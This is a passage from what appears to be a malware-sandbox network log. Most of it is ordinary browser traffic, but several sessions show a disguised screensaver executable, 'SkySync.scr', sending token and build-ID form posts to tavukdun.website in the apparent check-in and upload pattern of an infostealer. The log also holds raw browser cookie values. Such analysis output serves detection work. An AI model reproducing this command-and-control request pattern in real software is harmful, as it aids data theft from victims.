moved<A HREF="https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fh
2024-11-01 19:57:55 UTC	48	IN	Data Raw: 54 6b 56 55 58 30 31 46 55 31 4e 42 52 30 56 61 41 55 4d 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: TkVUX01FU1NBR0VaAUM">here</A>.</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.11.20	49811	142.250.65.164	443	5204	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-01 19:57:54 UTC	553	OUT	GET /async/newtab_promos HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9 Cookie: NID=517=i4E8sm-BN75bnGkPw4VW8uy51aQ8ounjntfNX2fu8MFJNuIvCX0dRBy-XkHqHwKOVFSSaC2nqfULsnHhY3TzIXHWC90jS3Wi2BINtQIDr1LJvZE4Ud-byTNL9Q04Nd1-ydmJvrWYY5vORspW6soJ1bMj20dq8UvPjgkw2sOvmuTUanqu
2024-11-01 19:57:55 UTC	763	IN	HTTP/1.1 302 Found Location: https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgS_YJblGMPllLkGIjAtGIvKzVg3AE6PiBpPfQx-2WM8-SG7P8hm8stV6RvffIWfQqKgkHW0kGgB2NlRAVsyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM x-hallmonitor-challenge: CgwIw-WUuQYQg7-wjgISBL9gluU Content-Type: text/html; charset=UTF-8 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Permissions-Policy: unload=() Date: Fri, 01 Nov 2024 19:57:55 GMT Server: gws Content-Length: 417 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-11-01 19:57:55 UTC	417	IN	Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 6f 72 72 79 2f 69 6e 64 65 78 3f 63 6f 6e 74 69 6e 75 65 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 70 72 6f 6d 6f 73 26 Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.11.20	49813	142.250.65.164	443	5204	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-01 19:57:55 UTC	901	OUT	GET /sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgS_YJblGMPllLkGIjDv19O-TQaehGs4CSEAsU7rd1JcKOqllDHwYGF3Bb1cH04t-5z9nPXgYmFTY64XsCcyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CI+2yQEIorbJAQipncoBCMD2ygEIlKHLAQic/swBCIWgzQEIrJ7OAQjkr84BCMO2zgEIvbnOAQjtvM4BCLu9zgEI1r3OAQjMv84BGMHLzAEYva7OARidsc4B Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9 Cookie: NID=517=i4E8sm-BN75bnGkPw4VW8uy51aQ8ounjntfNX2fu8MFJNuIvCX0dRBy-XkHqHwKOVFSSaC2nqfULsnHhY3TzIXHWC90jS3Wi2BINtQIDr1LJvZE4Ud-byTNL9Q04Nd1-ydmJvrWYY5vORspW6soJ1bMj20dq8UvPjgkw2sOvmuTUanqu
2024-11-01 19:57:55 UTC	356	IN	HTTP/1.1 429 Too Many Requests Date: Fri, 01 Nov 2024 19:57:55 GMT Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate Content-Type: text/html Server: HTTP server (unknown) Content-Length: 3207 X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-11-01 19:57:55 UTC	899	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 6f 67 62 3f 68 6c 3d 65 6e 2d 55 53 26 61 6d 70 3b 61 73 79 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta name="viewport" content="initial-scale=1"><title>https://www.google.com/async/newtab_ogb?hl=en-US&asy
2024-11-01 19:57:55 UTC	1255	IN	Data Raw: 0a 3c 73 63 72 69 70 74 3e 76 61 72 20 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b 20 3d 20 66 75 6e 63 74 69 6f 6e 28 72 65 73 70 6f 6e 73 65 29 20 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 61 70 74 63 68 61 2d 66 6f 72 6d 27 29 2e 73 75 62 6d 69 74 28 29 3b 7d 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 64 69 76 20 69 64 3d 22 72 65 63 61 70 74 63 68 61 22 20 63 6c 61 73 73 3d 22 67 2d 72 65 63 61 70 74 63 68 61 22 20 64 61 74 61 2d 73 69 74 65 6b 65 79 3d 22 36 4c 66 77 75 79 55 54 41 41 41 41 41 4f 41 6d 6f 53 30 66 64 71 69 6a 43 32 50 62 62 64 48 34 6b 6a 71 36 32 59 31 62 22 20 64 61 74 61 2d 63 61 6c 6c 62 61 63 6b 3d 22 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b 22 20 64 61 74 61 2d 73 3d 22 66 47 53 54 77 32 31 4c 66 Data Ascii: <script>var submitCallback = function(response) {document.getElementById('captcha-form').submit();};</script><div id="recaptcha" class="g-recaptcha" data-sitekey="6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b" data-callback="submitCallback" data-s="fGSTw21Lf
2024-11-01 19:57:55 UTC	1053	IN	Data Raw: 30 70 78 3b 20 6d 61 72 67 69 6e 3a 30 20 30 20 31 35 70 78 20 30 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 65 6d 3b 22 3e 0a 54 68 69 73 20 70 61 67 65 20 61 70 70 65 61 72 73 20 77 68 65 6e 20 47 6f 6f 67 6c 65 20 61 75 74 6f 6d 61 74 69 63 61 6c 6c 79 20 64 65 74 65 63 74 73 20 72 65 71 75 65 73 74 73 20 63 6f 6d 69 6e 67 20 66 72 6f 6d 20 79 6f 75 72 20 63 6f 6d 70 75 74 65 72 20 6e 65 74 77 6f 72 6b 20 77 68 69 63 68 20 61 70 70 65 61 72 20 74 6f 20 62 65 20 69 6e 20 76 69 6f 6c 61 74 69 6f 6e 20 6f 66 20 74 68 65 20 3c 61 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 70 6f 6c 69 63 69 65 73 2f 74 65 72 6d 73 2f 22 3e 54 65 72 6d 73 20 6f 66 20 53 65 72 76 69 63 65 3c 2f 61 3e 2e 20 54 68 65 20 62 6c 6f 63 6b 20 77 Data Ascii: 0px; margin:0 0 15px 0; line-height:1.4em;">This page appears when Google automatically detects requests coming from your computer network which appear to be in violation of the <a href="//www.google.com/policies/terms/">Terms of Service</a>. The block w

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.11.20	49814	142.250.65.164	443	5204	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-01 19:57:56 UTC	727	OUT	GET /sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgS_YJblGMPllLkGIjAtGIvKzVg3AE6PiBpPfQx-2WM8-SG7P8hm8stV6RvffIWfQqKgkHW0kGgB2NlRAVsyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9 Cookie: NID=517=i4E8sm-BN75bnGkPw4VW8uy51aQ8ounjntfNX2fu8MFJNuIvCX0dRBy-XkHqHwKOVFSSaC2nqfULsnHhY3TzIXHWC90jS3Wi2BINtQIDr1LJvZE4Ud-byTNL9Q04Nd1-ydmJvrWYY5vORspW6soJ1bMj20dq8UvPjgkw2sOvmuTUanqu
2024-11-01 19:57:56 UTC	356	IN	HTTP/1.1 429 Too Many Requests Date: Fri, 01 Nov 2024 19:57:56 GMT Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate Content-Type: text/html Server: HTTP server (unknown) Content-Length: 3135 X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-11-01 19:57:56 UTC	899	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 70 72 6f 6d 6f 73 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta name="viewport" content="initial-scale=1"><title>https://www.google.com/async/newtab_promos</title></head
2024-11-01 19:57:56 UTC	1255	IN	Data Raw: 61 63 6b 20 3d 20 66 75 6e 63 74 69 6f 6e 28 72 65 73 70 6f 6e 73 65 29 20 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 61 70 74 63 68 61 2d 66 6f 72 6d 27 29 2e 73 75 62 6d 69 74 28 29 3b 7d 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 64 69 76 20 69 64 3d 22 72 65 63 61 70 74 63 68 61 22 20 63 6c 61 73 73 3d 22 67 2d 72 65 63 61 70 74 63 68 61 22 20 64 61 74 61 2d 73 69 74 65 6b 65 79 3d 22 36 4c 66 77 75 79 55 54 41 41 41 41 41 4f 41 6d 6f 53 30 66 64 71 69 6a 43 32 50 62 62 64 48 34 6b 6a 71 36 32 59 31 62 22 20 64 61 74 61 2d 63 61 6c 6c 62 61 63 6b 3d 22 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b 22 20 64 61 74 61 2d 73 3d 22 64 35 73 32 48 34 2d 59 36 52 71 6c 36 7a 44 68 42 6a 36 32 35 79 4f 41 67 42 66 77 77 32 6f 4e 64 Data Ascii: ack = function(response) {document.getElementById('captcha-form').submit();};</script><div id="recaptcha" class="g-recaptcha" data-sitekey="6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b" data-callback="submitCallback" data-s="d5s2H4-Y6Rql6zDhBj625yOAgBfww2oNd
2024-11-01 19:57:56 UTC	981	IN	Data Raw: 73 20 70 61 67 65 20 61 70 70 65 61 72 73 20 77 68 65 6e 20 47 6f 6f 67 6c 65 20 61 75 74 6f 6d 61 74 69 63 61 6c 6c 79 20 64 65 74 65 63 74 73 20 72 65 71 75 65 73 74 73 20 63 6f 6d 69 6e 67 20 66 72 6f 6d 20 79 6f 75 72 20 63 6f 6d 70 75 74 65 72 20 6e 65 74 77 6f 72 6b 20 77 68 69 63 68 20 61 70 70 65 61 72 20 74 6f 20 62 65 20 69 6e 20 76 69 6f 6c 61 74 69 6f 6e 20 6f 66 20 74 68 65 20 3c 61 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 70 6f 6c 69 63 69 65 73 2f 74 65 72 6d 73 2f 22 3e 54 65 72 6d 73 20 6f 66 20 53 65 72 76 69 63 65 3c 2f 61 3e 2e 20 54 68 65 20 62 6c 6f 63 6b 20 77 69 6c 6c 20 65 78 70 69 72 65 20 73 68 6f 72 74 6c 79 20 61 66 74 65 72 20 74 68 6f 73 65 20 72 65 71 75 65 73 74 73 20 73 74 6f 70 2e 20 20 49 Data Ascii: s page appears when Google automatically detects requests coming from your computer network which appear to be in violation of the <a href="//www.google.com/policies/terms/">Terms of Service</a>. The block will expire shortly after those requests stop. I

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.11.20	49820	188.245.203.37	443	2896	C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr

Timestamp	Bytes transferred	Direction	Data
2024-11-01 19:58:01 UTC	324	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----JJECGHJDBFIJJJKEHCBF User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: tavukdun.website Content-Length: 1065 Connection: Keep-Alive Cache-Control: no-cache
2024-11-01 19:58:01 UTC	1065	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4a 4a 45 43 47 48 4a 44 42 46 49 4a 4a 4a 4b 45 48 43 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 63 34 34 65 63 66 30 62 34 37 61 30 61 66 31 38 63 39 62 38 39 35 30 34 30 31 39 37 62 39 34 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 45 43 47 48 4a 44 42 46 49 4a 4a 4a 4b 45 48 43 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 37 66 66 35 36 33 33 66 36 32 31 38 31 31 38 63 32 66 63 33 39 34 64 66 61 35 39 62 32 64 64 39 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 45 43 47 48 4a 44 42 46 49 4a 4a 4a 4b 45 48 43 42 46 0d 0a 43 6f 6e 74 Data Ascii: ------JJECGHJDBFIJJJKEHCBFContent-Disposition: form-data; name="token"7c44ecf0b47a0af18c9b895040197b94------JJECGHJDBFIJJJKEHCBFContent-Disposition: form-data; name="build_id"7ff5633f6218118c2fc394dfa59b2dd9------JJECGHJDBFIJJJKEHCBFCont
2024-11-01 19:58:02 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 01 Nov 2024 19:58:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-11-01 19:58:02 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.11.20	49821	188.245.203.37	443	2896	C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr

Timestamp	Bytes transferred	Direction	Data
2024-11-01 19:58:07 UTC	324	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----KEHJKJDGCGDAKFHIDBGC User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: tavukdun.website Content-Length: 1237 Connection: Keep-Alive Cache-Control: no-cache
2024-11-01 19:58:07 UTC	1237	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4b 45 48 4a 4b 4a 44 47 43 47 44 41 4b 46 48 49 44 42 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 63 34 34 65 63 66 30 62 34 37 61 30 61 66 31 38 63 39 62 38 39 35 30 34 30 31 39 37 62 39 34 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 48 4a 4b 4a 44 47 43 47 44 41 4b 46 48 49 44 42 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 37 66 66 35 36 33 33 66 36 32 31 38 31 31 38 63 32 66 63 33 39 34 64 66 61 35 39 62 32 64 64 39 0d 0a 2d 2d 2d 2d 2d 2d 4b 45 48 4a 4b 4a 44 47 43 47 44 41 4b 46 48 49 44 42 47 43 0d 0a 43 6f 6e 74 Data Ascii: ------KEHJKJDGCGDAKFHIDBGCContent-Disposition: form-data; name="token"7c44ecf0b47a0af18c9b895040197b94------KEHJKJDGCGDAKFHIDBGCContent-Disposition: form-data; name="build_id"7ff5633f6218118c2fc394dfa59b2dd9------KEHJKJDGCGDAKFHIDBGCCont
2024-11-01 19:58:08 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 01 Nov 2024 19:58:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-11-01 19:58:08 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.11.20	49822	188.245.203.37	443	2896	C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr

Timestamp	Bytes transferred	Direction	Data
2024-11-01 19:58:08 UTC	324	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----GCGCFCBAKKFBFIECAEBA User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: tavukdun.website Content-Length: 1965 Connection: Keep-Alive Cache-Control: no-cache
2024-11-01 19:58:08 UTC	1965	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 47 43 47 43 46 43 42 41 4b 4b 46 42 46 49 45 43 41 45 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 63 34 34 65 63 66 30 62 34 37 61 30 61 66 31 38 63 39 62 38 39 35 30 34 30 31 39 37 62 39 34 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 43 46 43 42 41 4b 4b 46 42 46 49 45 43 41 45 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 37 66 66 35 36 33 33 66 36 32 31 38 31 31 38 63 32 66 63 33 39 34 64 66 61 35 39 62 32 64 64 39 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 43 46 43 42 41 4b 4b 46 42 46 49 45 43 41 45 42 41 0d 0a 43 6f 6e 74 Data Ascii: ------GCGCFCBAKKFBFIECAEBAContent-Disposition: form-data; name="token"7c44ecf0b47a0af18c9b895040197b94------GCGCFCBAKKFBFIECAEBAContent-Disposition: form-data; name="build_id"7ff5633f6218118c2fc394dfa59b2dd9------GCGCFCBAKKFBFIECAEBACont
2024-11-01 19:58:09 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 01 Nov 2024 19:58:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-11-01 19:58:09 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.11.20	49823	188.245.203.37	443	2896	C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr

Timestamp	Bytes transferred	Direction	Data
2024-11-01 19:58:09 UTC	323	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----HCBAKJEHDBGHIEBGCGDG User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: tavukdun.website Content-Length: 437 Connection: Keep-Alive Cache-Control: no-cache
2024-11-01 19:58:09 UTC	437	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 48 43 42 41 4b 4a 45 48 44 42 47 48 49 45 42 47 43 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 63 34 34 65 63 66 30 62 34 37 61 30 61 66 31 38 63 39 62 38 39 35 30 34 30 31 39 37 62 39 34 0d 0a 2d 2d 2d 2d 2d 2d 48 43 42 41 4b 4a 45 48 44 42 47 48 49 45 42 47 43 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 37 66 66 35 36 33 33 66 36 32 31 38 31 31 38 63 32 66 63 33 39 34 64 66 61 35 39 62 32 64 64 39 0d 0a 2d 2d 2d 2d 2d 2d 48 43 42 41 4b 4a 45 48 44 42 47 48 49 45 42 47 43 47 44 47 0d 0a 43 6f 6e 74 Data Ascii: ------HCBAKJEHDBGHIEBGCGDGContent-Disposition: form-data; name="token"7c44ecf0b47a0af18c9b895040197b94------HCBAKJEHDBGHIEBGCGDGContent-Disposition: form-data; name="build_id"7ff5633f6218118c2fc394dfa59b2dd9------HCBAKJEHDBGHIEBGCGDGCont
2024-11-01 19:58:10 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 01 Nov 2024 19:58:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-11-01 19:58:10 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.11.20	53120	108.139.47.92	443	8896	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-01 19:58:17 UTC	902	OUT	GET /b?rn=1730491096841&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-US%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26startpage%3D1%26PC%3DU531%26OCID%3DMNHP_U531%26content%3D1%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=1537FB4C2D6A69131BC6EE662C9A68C5&cs_fpit=o&cs_fpdm=null&cs_fpdt=null HTTP/1.1 Host: sb.scorecardresearch.com Connection: keep-alive sec-ch-ua: "Chromium";v="94", "Microsoft Edge";v="94", ";Not A Brand";v="99" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Edg/94.0.992.31 sec-ch-ua-platform: "Windows" Accept: image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ntp.msn.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-01 19:58:17 UTC	943	IN	HTTP/1.1 302 Found Content-Length: 0 Connection: close Date: Fri, 01 Nov 2024 19:58:17 GMT Location: /b2?rn=1730491096841&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-US%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26startpage%3D1%26PC%3DU531%26OCID%3DMNHP_U531%26content%3D1%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=1537FB4C2D6A69131BC6EE662C9A68C5&cs_fpit=o&cs_fpdm=null&cs_fpdt=null set-cookie: UID=1F7d9f5bb2849a5509409d51730491097; SameSite=None; Secure; domain=.scorecardresearch.com; path=/; max-age=33696000 set-cookie: XID=1F7d9f5bb2849a5509409d51730491097; SameSite=None; Secure; Partitioned; domain=.scorecardresearch.com; path=/; max-age=33696000 Accept-CH: UA, Platform, Arch, Model, Mobile X-Cache: Miss from cloudfront Via: 1.1 e60ffc5cb1078c77d0ecabfc06b14cd0.cloudfront.net (CloudFront) X-Amz-Cf-Pop: JFK50-P1 X-Amz-Cf-Id: gTR5SyblL1udXe-yIFlmMBgBSI-xT0sN1lME3IxN4WWGF6B79EFtCw==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.11.20	54742	108.139.47.92	443	8896	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
